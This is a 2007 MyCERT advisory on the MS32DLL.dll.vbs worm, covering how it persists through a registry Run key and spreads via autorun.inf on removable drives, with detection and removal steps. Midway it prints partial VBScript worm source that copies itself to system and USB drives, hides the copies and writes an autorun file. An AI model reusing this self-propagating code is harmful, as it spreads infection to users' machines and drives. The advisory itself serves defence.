MyCERT Advisories
MyCERT Advisories, Alerts and Summaries for the year 2007
Bookmark and Share

MA-116.082007: MS32DLL.dll.vbs Malicious Code

Original Issue Date: 30th August 2007

Introduction

MyCERT received several reports from Internet users and organizations from our constituency regarding a malicious code, named MS32DLL.dll.vbs, that displays "Hacked by Pokemon", "Hacked by Godzilla" or "Hacked by Zodgilla" on IE/Firefox title bar once the infected PCs are on. The MS32DLL.dll.vbs is a low risk malicious code discovered on November 23 2006 and is written in Visual Basic.

The malicious code will infect every partition including removable drive.This is because the script was written to generate bha.vbs.dll and autorun.inf. The malicious code spread via removable drive such as pendrive or other storage device because of its capability to generate dll file using vbs script.

Based on assessment of number of reports received, we believe there is a widespread infection in our constituency and MyCERT advises users and organizations to update their anti-virus softwares with latest signature file and patch their systems and take the prevention actions as provided below to prevent against the current and future malicious code infection.

Systems Affected

  1. Windows 2000
  2. Windows XP
  3. Windows 2003
  4. Windows ME
  5. Windows NT
  6. Windows 95
  7. Windows 98

Technical Description

This thread will infect every of your partition including removable drive.This is because the script was written to generate *.vbs.dll and autorun.inf. The asterisk could be any names.

When the vbs malicious code is executed, it performs the following actions:

  1. Creates the following files:

    • %Windir%\MS32DLL.dll.vbs
    • [DRIVE LETTER]:\MS32DLL.dll.vbs
    • [DRIVE LETTER]:\autorun.inf

    Note: %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows (Windows 95/98/Me/XP) or C:\Winnt (Windows NT/2000).

  2. Adds the value:

    "MS32DLL" = "%Windir%\MS32DLL.dll.vbs"

    to the registry subkey:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    so that it runs every time Windows starts.

  3. Adds the value:

    "Window Title" = "Hacked by[REMOVED]"

    to the registry subkey:

    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

    to modify settings in Internet Explorer.

  4. Attempts to copy itself to removable drives and create registry entries every 200 seconds.

All your partition cannot open normally if your PC infected because the authority was given to the 'autoplay' option not 'open' option if normal condition.To ensure this,just right click one of your drives and see the first bolt option,is it open or autoplay.

Attached is the malicious code:

*****************************virus code starts**************************
\uffff\uffff'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
......
......
......
*****************************end virus code**************************

Detection

A text displays "Hacked by Pokemon", "Hacked by Godzilla", "Hacked by Zodgilla" will appear at the browsers' title bar on infected PC.

For USB Drive:

  1. Unplug all usbdrives connected to PC/notebooks.
  2. Plug the usbdrive back to the notebook.
  3. Right Click on usbdrive and Click 'Search' menu.
  4. Key-in a keyword search .vbs in your search program.
  5. Delete any files that can be found by the search program (normally the files will be at 'root' of the usbdrive).

For Notebook/PC:

  1. CTRL+ALT+DEL and look for wscript.exe in the processes. If the process exist/running, click End Process.

  2. Key-in a keyword search .vbs in your search program.

  3. Delete any files found manually in every partition.

  4. Clean up the Registry. Please follow the steps below:

    1. After clean and delete the file, now you must clean the windows registry because this thread generates new registry value after they were activated.

    2. Run registry editor:START -> Run (type regedit).

    3. Open this location:
      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL

    4. Delete registry named MS32DLL

    5. And open this location:
      HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

    6. Choose Window title and edit the string.

    7. You may put any names or delete the string value (Window title).

  5. Reboot your notebook/PC.

Prevention

  1. Install the latest computer updates/patches.

  2. Enable and use up-to-date antivirus software.

  3. Close all ports except your http port otherwise you need to filter the ports to authorized users only. This step is necessary for certain variant of *.vbs malicious code which can communicate/ download another virus.

  4. Enable a personal firewall on your computer.

  5. Practise safe email practices. You may refer at:
    http://www.mycert.org.my/en/resources/email/email_practices/main/detail/512/index.html

  6. You may refer to the below URL on protecting/securing your computer:
    http://www.mycert.org.my/en/resources/home_user/main/main/detail/518/index.html

Reference

  1. Symantec
    http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-112416-3424-99&tabid=3